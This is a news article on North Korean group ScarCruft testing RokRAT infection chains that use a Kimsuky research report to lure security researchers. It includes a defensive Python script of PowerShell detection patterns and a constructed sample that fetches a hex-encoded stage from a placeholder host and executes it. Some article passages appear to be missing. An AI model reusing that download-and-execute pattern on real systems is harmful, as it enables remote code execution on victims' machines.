ScarCruft, the North Korea-sponsored advanced persistent threat group, is gearing up for targeted attacks on cybersecurity researchers and other members of the threat intelligence community - likely in a bid to steal nonpublic threat intel and improve its operational playbook.
According to an analysis from SentinelLabs, ScarCruft spent November and December targeting media organizations and think-tank personnel that focus on North Korean affairs, in a series of fairly typical impersonation-style attacks that researchers expect to continue into 2024.
While analyzing that campaign, SentinelLabs researchers came across new, in-development malware and some trial infection chains that suggest that a different type of offensive is in the offing.
Cyberattackers Target the Threat Intelligence Community
This is not the first time that North Korean actors have targeted cybersecurity pros; but notably, the infection routine the attackers have been testing out is innovative in that it uses technical threat research on the North Korean APT known as Kimsuky as a lure.
The lure is a genuine report, published in October by Genians, a South Korean cybersecurity company - and using research that calls out a fellow North Korean APT as bait is a twist that appears to break new ground, according to Aleksandar Milenkoski, senior threat researcher at SentinelOne.
Cybersecurity Researchers Beware: ScarCruft Dangles Kimsuky Lure
ScarCruft has a long history of targeted attacks against South Korean individuals, as well as public and private entities, and acts as a cyber-espionage specialist for the Democratic People's Republic of Korea.
In the active campaign that was originally the focus of SentinelLabs' analysis, ScarCruft repeatedly targeted the same individuals with the goal of delivering RokRAT, a custom backdoor developed by the group that supports a range of surveillance functions on infected hosts.
RokRAT is also at the center of the wave of attacks on cybersecurity professionals that is likely coming, according to the SentinelLabs report.
Both malicious LNK files execute PowerShell code when opened. That code extracts the decoy Kimsuky PDF document and fetches a hex-encoded file named story.txt. In the sample analyzed, story.txt does nothing more harmful than open notepad.exe, which indicates that inteligence.lnk was built for testing purposes, the researchers explained.
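The chain described above (a shortcut that launches PowerShell, drops a decoy document, fetches a hex-encoded second stage and decodes it) is the kind of thing defenders can hunt for in shortcut arguments and process-creation telemetry. The following is an added example written for this page, not code from the article or from SentinelLabs: it scores a PowerShell command line against those traits, decodes any -EncodedCommand body so the same checks run on the hidden script, and decodes a hex-encoded stage the way the second-stage file would be decoded. Every command line, filename (report.lnk, report.pdf), host (example.invalid) and payload in it is constructed for the example, and the three-indicator threshold is an assumption, not a published rule.

```python
"""
Added example, not code from the article or from SentinelLabs: a triage helper
for PowerShell command lines recovered from a shortcut's arguments field or from
process-creation telemetry. It flags the traits the article attributes to the
test chain (a shortcut that launches PowerShell, drops a decoy document, fetches
a hex-encoded second stage, decodes it and runs the result), decodes any
-EncodedCommand body, and decodes a hex-encoded stage. Every command line,
filename and payload here is constructed for the example, not a captured sample.
"""
import base64
import re

# Indicator name -> pattern. Abbreviated PowerShell flags are accepted because
# attackers use them (-w hidden, -ep bypass, -enc ...).
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(p|x|xecutionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "web_fetch": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient", re.I),
    "hex_decode": re.compile(r"FromHexString|\[convert\]::ToByte\([^)]*,\s*16\)|-split\s*['\"]\(\.\.\)['\"]", re.I),
    "decoy_document": re.compile(r"\.(pdf|docx?|hwp)\b", re.I),
    "reads_own_lnk": re.compile(r"\.lnk\b", re.I),
    "executes_result": re.compile(r"Start-Process|\biex\b|Invoke-Expression|rundll32|regsvr32", re.I),
}


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand body (base64 of UTF-16LE), or None."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_hex_stage(text):
    """Decode a hex-encoded second stage (e.g. the body of a fetched .txt file).
    Whitespace and line breaks are stripped first; malformed hex raises ValueError."""
    return bytes.fromhex("".join(text.split()))


def triage(cmdline, stage=None):
    """Return the set of indicator names found in the command line, in its decoded
    -enc body (if any) and in an optional decoded second stage."""
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        texts.append(decoded)
    if stage is not None:
        texts.append(stage.decode("utf-8", errors="replace"))
    return {name for name, rx in INDICATORS.items() if any(rx.search(t) for t in texts)}


def verdict(hits):
    """Assumed threshold: three or more chain traits together is a hunting lead."""
    return "suspicious" if len(hits) >= 3 else "benign"


def build_encoded(script):
    """Wrap a script the way 'powershell -enc' expects it, for building test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed first stage mimicking the described chain: read the shortcut itself,
# drop and open a decoy PDF, fetch a hex-encoded file, decode it and execute it.
# report.lnk, report.pdf and example.invalid are hypothetical names.
STAGE1_SCRIPT = (
    "$l = Get-Content 'report.lnk' -Raw; "
    "Set-Content 'report.pdf' $decoy; Start-Process 'report.pdf'; "
    "$h = (New-Object Net.WebClient).DownloadString('http://example.invalid/story.txt'); "
    "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromHexString($h)))"
)
SUSPICIOUS_CMDLINE = "powershell.exe -w hidden -ep bypass -enc " + build_encoded(STAGE1_SCRIPT)
BENIGN_CMDLINE = "powershell.exe -NoProfile -File C:\\tools\\backup.ps1"

# Constructed hex-encoded second stage that, like the test chain the researchers
# describe, does nothing more than launch Notepad.
STAGE2_HEX = "Start-Process notepad.exe".encode().hex()

if __name__ == "__main__":
    stage2 = decode_hex_stage(STAGE2_HEX)
    for label, cmd in (("suspicious", SUSPICIOUS_CMDLINE), ("benign", BENIGN_CMDLINE)):
        hits = triage(cmd, stage=stage2 if label == "suspicious" else None)
        print(label, verdict(hits), sorted(hits))
```

The important design point is that the indicator scan runs over the decoded -enc body as well as the raw command line: a shortcut that hides its script behind base64 shows only hidden_window, policy_bypass and encoded_command on the surface, while the decoy-drop, hex-decode and fetch traits only appear after decoding. A second stage that decodes to nothing more than a Notepad launch, as in the test chain described above, still counts as executes_result, which is the right outcome for a hunting query: the delivery mechanism is what you want to catch before the payload changes.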
While the approach is similar to campaigns in the wild that researchers have previously analyzed, it's clear that the group is still fine-tuning its tooling and infection techniques.
Milenkoski advises cybersecurity researchers, especially those involved in examining the Korean threat landscape, to stay frosty and be on the lookout for cleverly designed, convincing email attacks going forward.
This Cyber News was published on www.darkreading.com. Publication date: Mon, 22 Jan 2024 20:45:05 +0000